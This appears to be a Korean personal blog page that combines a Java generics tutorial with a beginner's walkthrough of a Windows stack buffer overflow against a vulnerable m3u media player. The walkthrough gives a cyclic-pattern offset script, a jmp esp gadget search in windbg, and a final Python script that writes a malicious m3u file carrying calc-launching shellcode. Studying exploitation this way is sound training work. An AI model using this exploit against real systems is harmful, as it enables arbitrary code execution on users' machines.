ICEB34R
공부하는 아이스베어는 귀엽습니다..!
우분투 설치 안내.pptx
0.11MB
Week1_BOF.pptx
0.91MB
BOF.zip
0.00MB
성공적으로 풀이를 완료한 사람은 아래 비밀댓글로 출력된 문자열을 적어주세요~~
| [Week6] rpsAI, 64bit (0) | 2019.08.11 |
|---|---|
| [Week 5] Escape Paldal (4) | 2019.08.04 |
| [week 4] RTL,IDA (5) | 2019.07.29 |
| [week 3] got overwrite , pwntools (6) | 2019.07.15 |
| [week 2] canary, shellcode (7) | 2019.07.07 |
보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.
ArrayList<String> 처럼 받는 타입을 제한하는 것입니다.
각 타입별로 똑같은 코드를 짜지 않아도 되기 때문입니다.
예를 들어 이전의 ArrayList는 Object타입을 활용하여 만들어졌었고, 따라서 get할때 Casting이 필요했었습니다.
또한, Compile 단계에서 에러를 발생시켜 신뢰성있는 프로그램이 되도록 합니다.
ArrayList files = new ArrayList();
// get 하는 경우 Casting이 필요합니다
String filename = (String)files.get(0);
// String만 받기를 원하지만 다른 타입들도 add가 가능합니다
files.add(new File("Some Path"));
ArrayList<String> files = new ArrayList<>();
//따로 Casting이 필요 없습니다.
String filename = files.get(0);
//Compile Error가 발생하여 잘못됨을 Compile단계에서 알려줍니다.
files.add(new File("Some Path"));
pyblic class Pair<T>{ // T는 Type variable이라고 불립니다.
private T first;
private T second;
public Pair(){
first = null;
second = null;
}
public T getFirst(){
return first;
}
public T getSecond(){
return second;
}
public void setFirst(T first){
this.first = first;
}
public void setSecond(T second){
this.second = second;
}
}
Pair라는 클래스가 위와 같이 정의되어있다면, Pair<String> pair = new Pair();처럼 인스턴스화 하게될때 Pair안의 T들은 모두 String으로 대치되게 됩니다.
public class Pair<T,U> {
T first;
U second;
}
위 처럼 여러개의 Type variable을 쓸 수도 있습니다.
class ArrayHandle
{
public static <T> T getMiddle(T... a)
{
return a[a.length/2];
}
}
위와같이 Method도 Generic을 사용할 수 있습니다.
String middle = ArrayHandle.<String>getMiddle("A","B","C");
위 처럼 Method이름앞에 T 타입을 명시해줘야하지만 컴파일러가 알아서 해줍니다.
class PairHandle
{
public static <T> String getMergedString(T pair){
return T.getFirst+T.getSecond; // Compile Error
}
}
위의 코드에서 에러가 나는 이유는 T타입이 정해지지 않았는데, T에 .getFirst(), .getSecond()가 정의되어 있는지 확신할 수 없기 때문입니다.
이와같은 문제를 해결하기 위해 Bounds를 사용합니다.
public static <T extends Pair<String>> String......
위처럼 extends을 사용해서 T에는 Pair의 Sub type만 허용하도록 정의할 수 있습니다.
이때 extends 키워드는 상속받을 때 사용하는 extends와는 사용법도 조금 다른데, 의미적으로는 T가 subclass 라는 뜻이 아닌, Sub type임을 의미합니다. 또한 Interface도 받을 수 있습니다.
T extends Comparable & Cloneable
위 코드처럼 두 타입을 동시에 만족하는 타입만 받겠다는 의미로 사용할 수도 있습니다.
ArrayList<Manager> managerList= new ArrayList<>();
ArrayList<Employee> employeeList = new ArrayList<>();
employeeList.add(managerList); // Compile Error
Manager와 Employee는 상속관계에 있지만 제네릭으로 제한된 각 ArrayList끼리는 상속관계가 없기 때문에 Compile Error가 발생합니다.
이와 같은 문제를 해결하기 위해 Wildcard를 사용합니다.
| libc를 통한 스택주소 릭 방법 (0) | 2018.12.31 |
|---|
드디어 리눅스 포너블만 하다가 윈도우 포너블에 관심이 생겼습니다~!~!
어떻게 시작하지 막막해있었는데 검색해보니 몇몇 문서들이 있더군요. ( window exploit tutorial.. 등등 )
그렇게 찾은 문서들에서 가장 먼저 소개하는 것을 해보기로 했습니다. 그냥 간단한 스택오버플로우 문제인데 , PE구조도 잘 모르고 디버거도 처음 써보다보니 헤맨점이 많았습니다.
아 그리고 처음에 제대로 익스가 안돼서 고생했는데 혹시 맥북에 parallels로 윈도우 사용하시는 분은 구성용도를 개발말고 문서용인가 그걸로 해보시면 될 것 같습니다.
이제 각설하고 시작합니다.
https://www.exploit-db.com/exploits/9177 해당 사이트에서 취약한 프로그램을 다운로드 받으실 수 있습니다.
해당 프로그램은 m3u 파일에 데이터가 약 26000바이트 이상일때 리턴어드레스를 덮을 수 있는 오버플로우가 납니다.
1 2 3 4 5 6 7 8 9 | junk = "A"*26000 payload = junk f = open("1.m3u","wb") f.write(payload) f.close() print "success!" | cs |
해당코드를 짠 뒤 프로그램으로 실행해보았습니다.
해당 파일은 리턴어드레스는 건들지 않았기 때문에 프로그램이 오류만 내고 크래쉬가 나지는 않습니다.
1 2 3 4 5 6 7 8 9 | junk = "A"*27000 payload = junk f = open("1.m3u","wb") f.write(payload) f.close() print "success!" | cs |
27000개의 A를 주면 아래 처럼 크래쉬가 나면서 windbg가 실행됩니다.
(관리자 cmd에 windbg -I하면 크래쉬가 났을때 자동으로 attach됩니다.)
디버거를 잘 보시면 41414141에서 터진것을 알 수 있습니다. 리턴어드레스가 우리가 파일로준 A에 의해 덮혀 AAAA의 hex값 0x41414141로 뛸려고 했기때문에 크래쉬가 난 것입니다.
이제 정확히 리턴어드레스의 위치를 알아야합니다. 그래야 원하는 주소로 컨트롤 할 수 있으니까요!
우리는 pattern을 이용할겁니다. 원래는 kali에 있는 툴중 하나라고합니다. 하지만 python으로 구현해놓은것이 있어서 그것을 이용할겁니다. (kali깔공간이 없어요...)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 | #!/usr/bin/env python2 import sys import struct def pattern_create(length): pattern = '' parts = ['A', 'a', '0'] while len(pattern) != length: pattern += parts[len(pattern) % 3] if len(pattern) % 3 == 0: parts[2] = chr(ord(parts[2]) + 1) if parts[2] > '9': parts[2] = '0' parts[1] = chr(ord(parts[1]) + 1) if parts[1] > 'z': parts[1] = 'a' parts[0] = chr(ord(parts[0]) + 1) if parts[0] > 'Z': parts[0] = 'A' return pattern def pattern_offset(value, buflen): if value.startswith('0x'): value = struct.pack('<I', int(value, 16)).strip('\x00') pattern = pattern_create(buflen) try: return pattern.index(value) except ValueError: return 'Not found' def print_help(): print 'Usage: %s (create | offset) <value> <buflen>' % sys.argv[0] def main(): if len(sys.argv) < 3 or sys.argv[1].lower() not in ['create', 'offset']: print_help() sys.exit(255) command = sys.argv[1].lower() num_value = sys.argv[2] if command == 'create': print pattern_create(int(num_value)) else: if len(sys.argv) == 4: try: buflen = int(sys.argv[3]) except ValueError: print_help() sys.exit(254) else: buflen = 8192 print pattern_offset(num_value, buflen) if __name__ == '__main__': main() | cs |
(github검색하면 안나오는게 없어요..ㅎㅎ)
이제 cmd에서 python pattern.py create 5000 하게되면
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af... (너무길어서 잘랐습니다)
5000개의 패턴이 생성됩니다. 이 패턴은 세개가 한 청크로 구성되는데 제일 처음은 대문자 다음은 소문자 다음은 숫자가 번갈아가며 나옵니다. 따라서 중간의 어느곳을 떼와도 몇번째에 있는지 알 수 있게 해주죠. ( '한마디로 자기자리가 있다' 이말입니다.)
1 2 3 4 5 6 7 8 9 10 11 | junk = "A"*26000 pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk" payload = junk + pattern f = open("2.m3u","wb") f.write(payload+pattern) f.close() print "success!" | cs |
해당스크립트를 실행해 나온 2.m3u를 먹여보면
위와같이 63413363이라는 값에서 터진것을 알 수 있습니다. 이는 우리가 적어준 패턴중 4바이트이며,
리턴어드레스까지 정확한 거리(offset)은 아까 보여드린 pattern.py를 통해 계산할 수 있습니다.
cmd에 python pattern.py offset 0x63413363를 입력합니다.
위처럼 70 이라는 숫자가 결과로 나옵니다.
이 뜻은 junk를 "A"*26070을 주면 그 다음 4바이트가 리턴어드레스에 덮힌다 라는 것입니다.
다음으로는 쉘코드를 삽입해야 합니다. 아래의 쉘코드는 계산기를 띄우는 쉘코드이고 현재 환경은 windows7 입니다. ( 다른환경이신 분은 다른 쉘코드를 구글에서 검색해보시길 바랍니다.)
그런데 저희의 시나리오는 쉘코드로 eip를 돌리는 것인데, 위의 사진을 보시면 쉘코드가 들어갈 스택의 주소가 앞에 '\x00'이 붙어있습니다. 따라서 ret을 저 주소로 돌리게 되면 \x00에서 끊기고 더이상 진행이 되지 않습니다. (windbg에서 d 레지스터를 하면 해당 레지스터의 값이 가진 데이터를 볼 수 있습니다.)
그래서 전략을 jmp esp를 찾아서 쉘코드로 점프하게 해봅시다.
그렇다면 jmp esp를 어떻게 찾냐하면
이처럼 lm을 하면 모듈들을 볼 수 있습니다.
그중 kernel32의 주소를 인자로 주고 s 시작주소 끝주소 FF E4를 하면 주소가 하나 나옵니다. ( FF E4가 jmp esp를 뜻함 )
이 주소를 u 해보면 jmp esp라는 것을 확인할 수 있습니다. ( u 주소는 해당 주소의 어셈블리 명령을 볼 수 있습니다. )
이제 거의 끝났습니다.
그런데 ret하고난뒤 esp는 우리가 넣어준 리턴값 다음이 바로오지 않습니다. 쉽게말해서 AAA..AAABBBB(ret)CCCCDDDD...이렇게 주었을 때 eip는 42424242가되어도 d esp를 해보면 43434343이 아닌 44444444가 된다는 것입니다. 이것은 리턴 인스트럭션을 정확하게는 몰라서 설명이 힘들거 같습니다.. ㅠㅠ
따라서 더미 4바이트를 주어야 한다는 것입니다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | import struct jmpesp = 0x757b310e junk = "A"*26070 ret = struct.pack('<L',jmpesp) dummy = "BEAR" shell = ( "\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64" "\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B" "\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20" "\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07" "\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74" "\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7") payload = junk+ret+dummy+shell f = open("hacked.m3u","wb") f.write(payload) f.close() print "success!" | cs |
